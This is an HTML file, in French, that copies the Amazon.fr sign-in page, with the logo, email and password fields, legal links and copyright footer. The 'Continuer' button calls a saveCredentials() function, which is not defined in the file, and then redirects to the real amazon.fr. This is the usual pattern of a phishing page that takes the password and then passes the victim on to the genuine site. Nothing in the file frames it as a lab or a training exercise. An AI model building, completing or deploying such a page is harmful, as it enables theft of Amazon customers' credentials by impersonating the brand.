<!DOCTYPE html>
<html>
<head>
    <title>Page de Connexion Amazon</title>
    <link rel="stylesheet" type="text/css" href="style.css">
    <script>       
        function redirectToAmazon() {
            window.location.href = "https://www.amazon.fr/";
        }

        function AccountAmazon() {
            window.location.href = "https://www.amazon.fr/ap/register?showRememberMe=true&openid.pape.max_auth_age=0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&pageId=frflex&mobileBrowserWeblabTreatment=C&openid.return_to=https%3A%2F%2Fwww.amazon.fr%2Fgp%2Fhelp%2Fcustomer%2Fdisplay.html%3Fie%3DUTF8%26tag%3Dgooghydr0a8-21%26hvadid%3D433998432222%26hvpos%3D%26hvexid%3D%26hvnetw%3Dg%26hvrand%3D11409113362605978171%26hvpone%3D%26hvptwo%3D%26hvqmt%3De%26hvdev%3Dc%26ref%3Dnav_ya_signin&prevRID=JAQBD2Z7T3YBAYHZ15V6&openid.assoc_handle=frflex&openid.mode=checkid_setup&desktopBrowserWeblabTreatment=C&prepopulatedLoginId=&failedSignInCount=0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0";
        }
        
        function toggleHelpOptions() {
            var helpOptions = document.getElementById("help-options");
            helpOptions.style.display = helpOptions.style.display === "none" ? "block" : "none";
        }


    </script>

    <style>
        a {
            text-decoration: none;
        }
        /* Style pour l'image */
        img {
            width: 125px; /* Largeur de l'image */
            height: auto; /* Hauteur ajustée automatiquement pour maintenir les proportions */
            display: block; /* Pour éviter l'espace réservé en bas de l'image */
            margin: 10px auto; /* Marge pour centrer l'image horizontalement */
        }
        
        /* Style pour le rectangle */
        .rectangle {
            width: 340px; /* Largeur du rectangle */
            height: 420px; /* Hauteur du rectangle */
            border: 0.5px solid #c7c1c1; /* Bordure de 2px de largeur */
            margin: 10px auto; /* Centrage horizontal et espacement supérieur */
            text-align: center; /* Centrer le contenu horizontal */
            border-radius: 10px; /* Arrondir les coins du rectangle */
            position: relative; /* Positionnement relatif */
        }
        
        /* Style pour le bouton Continuer */
        .continue-button {
            position: absolute;
            top: 200px;
            left: 23px;
            width: 300px;
            padding: 10px;
            border-radius: 10px; /* Arrondir les coins du rectangle */
            background-color: rgb(250, 204, 1);
            border: none;
            cursor: pointer;
            transition: background-color 0.3s ease-in-out;
        }
        
        .continue-button:hover {
            background-color: gold;
        }
        

        .account-button {
            position: absolute;
            top: 445px;
            left: 23px;
            width: 300px;
            padding: 10px;
            border-radius: 10px; /* Arrondir les coins du rectangle */
            background-color: rgb(255, 255, 255);
            border: 1px solid rgb(173, 171, 171);
            cursor: pointer;
            transition: background-color 0.3s ease-in-out;
        }
        
        
        .footer {
            width: 537%;
            height: 1px;
            left: -1000px;
            background-color: #aaa;
            position: absolute;
            top: 500px;
        }
    </style>
</head>
<body>
    <img src="amazonLogo.png" style="margin: 10px auto; display: block; width: 125px; height: auto;">
    
    <div class="rectangle">
        <p style="font-family: 'Verdana', sans-serif; font-size: 27px; position: absolute; top: -9px; left: 16px;">S'identifier</p>
        <p style="font-family: 'Arial Black', serif; font-size: 12px; position: absolute; top: 40px; left: 18px;">Adresse e-mail ou numéro de téléphone</p>
        <p style="font-family: 'Arial Black'; font-size: 12px; position: absolute; top: 60px; left: 18px;">portable</p>
        <p style="font-family: 'Arial Black'; font-size: 12px; position: absolute; top: 125px; left: 18px;">Mot de passe</p>
        
        <input type="password" id="password" name="password" style="position: absolute; border: 1px solid rgb(173, 171, 171); border-radius: 3px; top: 160px; left: 15px; width: 300px; padding: 6px;">
        
        <input type="text" id="email" name="email" style="position: absolute; border: 1px solid rgb(173, 171, 171); border-radius: 3px; top: 95px; left: 15px; width: 300px; padding: 6px;">
        
        <input type="button" value="Continuer" class="continue-button" onclick="saveCredentials(); redirectToAmazon()">
        <input type="button" value="Créer votre compte Amazon" class="account-button" onclick="AccountAmazon()">
        
        <p style="font-family: 'Verdana', serif; font-size: 12px; line-height: 1.2; position: absolute; top: 235px; left: 3px;">En passant votre commande, vous acceptez les <a href="https://www.amazon.fr/gp/help/customer/display.html?nodeId=548524">Conditions générales</a> de vente d'Amazon. Veuillez consulter notre <a href="https://www.amazon.fr/gp/help/customer/display.html?nodeId=3329781">Notice Protection de vos informations personnelles</a>, notre <a href="https://www.amazon.fr/gp/help/customer/display.html?nodeId=201890250">Notice Cookies</a> et notre <a href="https://www.amazon.fr/gp/help/customer/display.html?nodeId=201909150">Notice Annonces publicitaires basées sur vos centres d'intérêt</a>.</p>
        
        <!-- Flèche "Avez-vous besoin d'aide ?" -->
        <p style="font-family: 'Arial Black'; font-size: 11.5px; position: absolute; top: 330px; left: 18px; cursor: pointer;"
           onclick="toggleHelpOptions()">Avez-vous besoin d'aide ? &#9660;</p>
        
        <!-- Options d'aide cachées par défaut -->
        <div id="help-options" style="display: none; position: absolute; top: 370px; left: 15px;">
            <a href="https://www.amazon.fr/ap/forgotpassword">Mot de passe oublié</a><br>
            <a href="https://www.amazon.fr/gp/help/customer/display.html">Autres problèmes de connexion</a>
        </div>
        
        <div class="footer"></div>
    </div>

    <div>
    <p style="font-family: 'Verdana', sans-serif; font-size: 11px; position: absolute; top: 560px; left: 220px;"><a href="https://www.amazon.fr/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&nodeId=548524">Conditions d'utilisation</a> </p>
    <p style="font-family: 'Verdana', sans-serif; font-size: 11px; position: absolute; top: 560px; left: 370px;"><a href="https://www.amazon.fr/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&nodeId=3329781">Protection de vos informations personnelles </a> </p>
    <p style="font-family: 'Verdana', sans-serif; font-size: 11px; position: absolute; top: 560px; left: 650px;"><a href="https://www.amazon.fr/gp/help/customer/display.html?nodeId=559912">Aide </a> </p>
    <p style="font-family: 'Verdana', sans-serif; font-size: 11px; position: absolute; top: 560px; left: 740px;"><a href="https://www.amazon.fr/gp/help/customer/display.html/?nodeId=201890250">Cookies </a> </p> 
    <p style="font-family: 'Verdana', sans-serif; font-size: 11px; position: absolute; top: 560px; left: 820px;"><a href="https://www.amazon.fr/gp/help/customer/display.html/?nodeId=201909150">Annonces basées sur vos centres d'intérêt  </a> </p> 
    <p style="font-family: 'Verdana', sans-serif; font-size: 10px; position: absolute; top: 590px; left: 540px;">© 1996-2023, Amazon.com Inc. ou ses affiliés</p>
    </div>

</body>
</html>
